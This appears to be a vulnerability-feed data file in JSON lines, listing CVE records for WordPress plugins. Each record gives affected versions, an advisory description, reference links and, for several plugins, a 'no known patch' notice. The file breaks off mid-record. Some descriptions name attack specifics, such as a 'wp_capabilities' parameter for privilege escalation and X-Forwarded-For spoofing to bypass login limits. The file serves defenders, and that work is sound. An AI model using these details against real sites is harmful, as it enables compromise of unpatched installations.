{"CVE_ID":"CVE-2023-2303","slug":"lead-capturing-call-to-actions-by-vcita","versionImpact":"2.6.4","description":"The Contact Form and Calls To Action by vcita plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.6.4. This is due to missing nonce validation in the vcita-callback.php file. This makes it possible for unauthenticated attackers to modify the plugin's settings and inject malicious JavaScript via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lead-capturing-call-to-actions-by-vcita\\\/trunk\\\/vcita-callback.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lead-capturing-call-to-actions-by-vcita\\\/trunk\\\/vcita-callback.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2345c972-9fd4-4709-8bde-315ab54f60e2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2345c972-9fd4-4709-8bde-315ab54f60e2?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.jonh.eu\\\/blog\\\/security-vulnerabilities-in-wordpress-plugins-by-vcita\",\"name\":\"https:\\\/\\\/blog.jonh.eu\\\/blog\\\/security-vulnerabilities-in-wordpress-plugins-by-vcita\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-35093","slug":"masterstudy-lms-learning-management-system","versionImpact":"3.0.7","description":"Broken Access Control vulnerability in StylemixThemes MasterStudy LMS WordPress Plugin \u2013 for Online Courses and Education plugin <=\u00a03.0.8 versions allows\u00a0any logged-in users, such as subscribers to view the \"Orders\" of the plugin and get the data related to the order like\u00a0email, username, and more.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/masterstudy-lms-learning-management-system\\\/wordpress-masterstudy-lms-plugin-3-0-7-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/masterstudy-lms-learning-management-system\\\/wordpress-masterstudy-lms-plugin-3-0-7-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4242","slug":"full-customer","versionImpact":"2.2.3","description":"The FULL - Customer plugin for WordPress is vulnerable to Information Disclosure via the \/health REST route in versions up to, and including, 2.2.3 due to improper authorization. This allows authenticated attackers with subscriber-level permissions and above to obtain sensitive information about the site configuration as disclosed by the WordPress health check.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a77d0fb5-8829-407d-a40a-169cf0c5f837?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a77d0fb5-8829-407d-a40a-169cf0c5f837?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/1.1.0\\\/app\\\/api\\\/Health.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/full-customer\\\/tags\\\/1.1.0\\\/app\\\/api\\\/Health.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6845","slug":"commenttweets","versionImpact":"0.6","description":"The CommentTweets WordPress plugin through 0.6 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cbdaf158-f277-4be4-b022-68d18dae4c55\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cbdaf158-f277-4be4-b022-68d18dae4c55\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/magos-securitas.com\\\/txt\\\/2023-6845\",\"name\":\"https:\\\/\\\/magos-securitas.com\\\/txt\\\/2023-6845\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0604","slug":"foogallery","versionImpact":"2.4.7","description":"The Best WordPress Gallery Plugin \u2013 FooGallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.4.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d17d9610-d0fd-419d-a7ea-e9c313f1c542?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d17d9610-d0fd-419d-a7ea-e9c313f1c542?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/advisory.abay.sh\\\/cve-2024-0604\",\"name\":\"https:\\\/\\\/advisory.abay.sh\\\/cve-2024-0604\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Ffoogallery%2Ftags%2F2.4.7&old=3035688&new_path=%2Ffoogallery%2Ftags%2F2.4.9&new=3035688&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Ffoogallery%2Ftags%2F2.4.7&old=3035688&new_path=%2Ffoogallery%2Ftags%2F2.4.9&new=3035688&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2460","slug":"gamipress-button","versionImpact":"1.0.7","description":"The GamiPress \u2013 Button plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'gamipress_button' shortcode in all versions up to, and including, 1.0.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af39e563-5d88-460d-b02d-1aaa111c89dd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af39e563-5d88-460d-b02d-1aaa111c89dd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3051778%40gamipress-button&new=3051778%40gamipress-button&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3051778%40gamipress-button&new=3051778%40gamipress-button&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4532","slug":"login-attempts-limit-wp","versionImpact":"2.1","description":"The LOGIN AND REGISTRATION ATTEMPTS LIMIT plugin for WordPress is vulnerable to IP Address Spoofing in versions up to, and including, 2.1. This is due to insufficient restrictions on where the IP Address information is being retrieved for request logging and login restrictions. Attackers can supply the X-Forwarded-For header with with a different IP Address that will be logged and can be used to bypass settings that may have blocked out an IP address from logging in.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/50421e90-ccd6-4896-8041-b99279314301?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/50421e90-ccd6-4896-8041-b99279314301?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-attempts-limit-wp\\\/trunk\\\/includes\\\/Ip.php#L41\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-attempts-limit-wp\\\/trunk\\\/includes\\\/Ip.php#L41\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9067","slug":"youzify","versionImpact":"1.3.0","description":"The Youzify \u2013 BuddyPress Community, User Profile, Social Network & Membership Plugin for WordPress plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'delete_attachment' function in all versions up to, and including, 1.3.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary attachments.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e099d8e2-6305-43fc-8807-a37791deb2ff?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e099d8e2-6305-43fc-8807-a37791deb2ff?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/youzify\\\/trunk\\\/includes\\\/public\\\/core\\\/class-youzify-attachments.php#L1183\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/youzify\\\/trunk\\\/includes\\\/public\\\/core\\\/class-youzify-attachments.php#L1183\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9607","slug":"wd-facebook-feed","versionImpact":"1.2.9","description":"The 10Web Social Post Feed plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.2.9. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. Please note this is only exploitable when the leave a review notice is present.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be151552-827c-43a6-a0e0-da19884448fd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be151552-827c-43a6-a0e0-da19884448fd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wd-facebook-feed\\\/trunk\\\/wd\\\/includes\\\/notices.php#L204\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wd-facebook-feed\\\/trunk\\\/wd\\\/includes\\\/notices.php#L204\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11378","slug":"bizapp-for-woocommerce","versionImpact":"2.0.8","description":"The Bizapp for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'error' parameter in all versions up to, and including, 2.0.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bizapp-for-woocommerce\\\/trunk\\\/admin\\\/class-bizapp-woocommerce-order.php#L599\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bizapp-for-woocommerce\\\/trunk\\\/admin\\\/class-bizapp-woocommerce-order.php#L599\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45cf9e0e-3a8a-400a-b766-7b352e739b7c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45cf9e0e-3a8a-400a-b766-7b352e739b7c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13098","slug":"wp-email-newsletter","versionImpact":"1.1","description":"The WordPress Email Newsletter WordPress plugin through 1.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/eac71f70-993e-4353-8550-affb24c61c02\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/eac71f70-993e-4353-8550-affb24c61c02\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13592","slug":"team-builder-for-wpbakery-page-builder","versionImpact":"1.0","description":"The Team Builder For WPBakery Page Builder(Formerly Visual Composer) plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.0 via the 'team-builder-vc' shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/team-builder-for-wpbakery-page-builder\\\/tags\\\/1.0\\\/plugin.class.php#L55\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/team-builder-for-wpbakery-page-builder\\\/tags\\\/1.0\\\/plugin.class.php#L55\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ee7e8d76-a461-4b0b-a312-c6ea4b8ac375?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ee7e8d76-a461-4b0b-a312-c6ea4b8ac375?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12634","slug":"related-post","description":"The Related Posts, Inline Related Posts, Contextual Related Posts, Related Content By PickPlugins plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including 2.0.59. This is due to missing nonce validation on a function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/related-post\\\/tags\\\/2.0.58b\\\/includes\\\/menu\\\/settings.php#L129\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/related-post\\\/tags\\\/2.0.58b\\\/includes\\\/menu\\\/settings.php#L129\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3251482\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3251482\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/related-post\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/related-post\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/29d22612-8e0d-4275-b370-9729352c951e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/29d22612-8e0d-4275-b370-9729352c951e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6798","slug":"dl-verification","versionImpact":"1.2","description":"The DL Verification WordPress plugin through 1.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c719922e-b2b3-452f-856a-5cc983a4ac18\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c719922e-b2b3-452f-856a-5cc983a4ac18\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8146","slug":"qi-addons-for-elementor","versionImpact":"1.9.2","description":"The Qi Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's TypeOut Text widget in all versions up to, and including, 1.9.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3335762\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3335762\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/qi-addons-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/qi-addons-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4fdfdcbe-014b-4b68-9ac5-976d384106c3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4fdfdcbe-014b-4b68-9ac5-976d384106c3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4580","slug":"twenty20","versionImpact":"1.5.9","description":"The Twenty20 Image Before-After WordPress plugin through 1.5.9 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e54804c7-68a9-4c4c-94f9-1c3c9b97e8ca\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e54804c7-68a9-4c4c-94f9-1c3c9b97e8ca\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2302","slug":"lead-capturing-call-to-actions-by-vcita","versionImpact":"2.6.4","description":"The Contact Form and Calls To Action by vcita plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'email' parameter in versions up to, and including, 2.6.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with the edit_posts capability, such as contributors and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lead-capturing-call-to-actions-by-vcita\\\/trunk\\\/vcita-callback.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lead-capturing-call-to-actions-by-vcita\\\/trunk\\\/vcita-callback.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4dfc237a-9157-4da9-ba8f-9daf2ba4f20b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4dfc237a-9157-4da9-ba8f-9daf2ba4f20b?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.jonh.eu\\\/blog\\\/security-vulnerabilities-in-wordpress-plugins-by-vcita\",\"name\":\"https:\\\/\\\/blog.jonh.eu\\\/blog\\\/security-vulnerabilities-in-wordpress-plugins-by-vcita\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4239","slug":"real-estate-manager","versionImpact":"6.7.1","description":"The Real Estate Manager plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 6.7.1 due to insufficient restriction on the 'rem_save_profile_front' function. This makes it possible for authenticated attackers, with minimal permissions such as a subscriber, to modify their user role by supplying the 'wp_capabilities' parameter during a profile update.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/real-estate-manager\\\/tags\\\/6.7.1\\\/classes\\\/shortcodes.class.php#L1439\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/real-estate-manager\\\/tags\\\/6.7.1\\\/classes\\\/shortcodes.class.php#L1439\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d83d1fd0-6e21-406e-a7c0-89d26eabbb32?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d83d1fd0-6e21-406e-a7c0-89d26eabbb32?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-1751","slug":"wp-skitter-slideshow","versionImpact":"2.5.2","description":"The Skitter Slideshow plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.5.2 via the \/image.php file. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/175eba7e-454b-4ba3-bbb5-22bd56734f5c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/175eba7e-454b-4ba3-bbb5-22bd56734f5c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/securityforeveryone.com\\\/blog\\\/wordpress-skitter-slideshow-ssrf-0-day-vulnerability-cve-2022-1751\",\"name\":\"https:\\\/\\\/securityforeveryone.com\\\/blog\\\/wordpress-skitter-slideshow-ssrf-0-day-vulnerability-cve-2022-1751\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-skitter-slideshow\\\/trunk\\\/image.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-skitter-slideshow\\\/trunk\\\/image.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9022","slug":"poll-wp","versionImpact":"2.3.9","description":"The TS Poll \u2013 Survey, Versus Poll, Image Poll, Video Poll plugin for WordPress is vulnerable to SQL Injection via the \u2018orderby\u2019 parameter in all versions up to, and including, 2.3.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d16363d6-ca4b-4de0-abae-a7b07803e2e3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d16363d6-ca4b-4de0-abae-a7b07803e2e3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/179414\\\/WordPress-Poll-2.3.6-SQL-Injection.html\",\"name\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/179414\\\/WordPress-Poll-2.3.6-SQL-Injection.html\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/capture0x\\\/Poll-Plugin-SQL-Injection-\",\"name\":\"https:\\\/\\\/github.com\\\/capture0x\\\/Poll-Plugin-SQL-Injection-\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/poll-wp\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/poll-wp\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/total-soft.com\\\/wp-poll\\\/\",\"name\":\"https:\\\/\\\/total-soft.com\\\/wp-poll\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10262","slug":"drop-shadow-boxes","versionImpact":"1.7.14","description":"The The Drop Shadow Boxes plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.7.14. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary shortcodes.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa0a296a-a93f-4c0e-9911-b4f9bdd53fad?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa0a296a-a93f-4c0e-9911-b4f9bdd53fad?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drop-shadow-boxes\\\/trunk\\\/dropshadowboxes.php#L150\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drop-shadow-boxes\\\/trunk\\\/dropshadowboxes.php#L150\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/drop-shadow-boxes\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/drop-shadow-boxes\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11377","slug":"automate-hub-free-by-sperse-io","versionImpact":"1.7.0","description":"The Automate Hub Free by Sperse.IO plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'id' parameter in all versions up to, and including, 1.7.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/automate-hub-free-by-sperse-io\\\/tags\\\/1.7.0\\\/apps\\\/c\\\/clickup\\\/clickup.php#L92\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/automate-hub-free-by-sperse-io\\\/tags\\\/1.7.0\\\/apps\\\/c\\\/clickup\\\/clickup.php#L92\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/automate-hub-free-by-sperse-io\\\/tags\\\/1.7.0\\\/apps\\\/e\\\/encharge\\\/encharge.php#L82\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/automate-hub-free-by-sperse-io\\\/tags\\\/1.7.0\\\/apps\\\/e\\\/encharge\\\/encharge.php#L82\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/automate-hub-free-by-sperse-io\\\/tags\\\/1.7.0\\\/apps\\\/g\\\/getgist\\\/getgist.php#L85\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/automate-hub-free-by-sperse-io\\\/tags\\\/1.7.0\\\/apps\\\/g\\\/getgist\\\/getgist.php#L85\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/automate-hub-free-by-sperse-io\\\/tags\\\/1.7.0\\\/apps\\\/g\\\/googlecontact\\\/googlecontact.php#L100\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/automate-hub-free-by-sperse-io\\\/tags\\\/1.7.0\\\/apps\\\/g\\\/googlecontact\\\/googlecontact.php#L100\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/automate-hub-free-by-sperse-io\\\/tags\\\/1.7.0\\\/apps\\\/m\\\/mailchimp\\\/mailchimp.php#L179\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/automate-hub-free-by-sperse-io\\\/tags\\\/1.7.0\\\/apps\\\/m\\\/mailchimp\\\/mailchimp.php#L179\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/automate-hub-free-by-sperse-io\\\/tags\\\/1.7.0\\\/apps\\\/t\\\/teamwork\\\/teamwork.php#L82\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/automate-hub-free-by-sperse-io\\\/tags\\\/1.7.0\\\/apps\\\/t\\\/teamwork\\\/teamwork.php#L82\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a143eb71-d039-441b-871e-d1c5cefb0529?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a143eb71-d039-441b-871e-d1c5cefb0529?source=cve\",\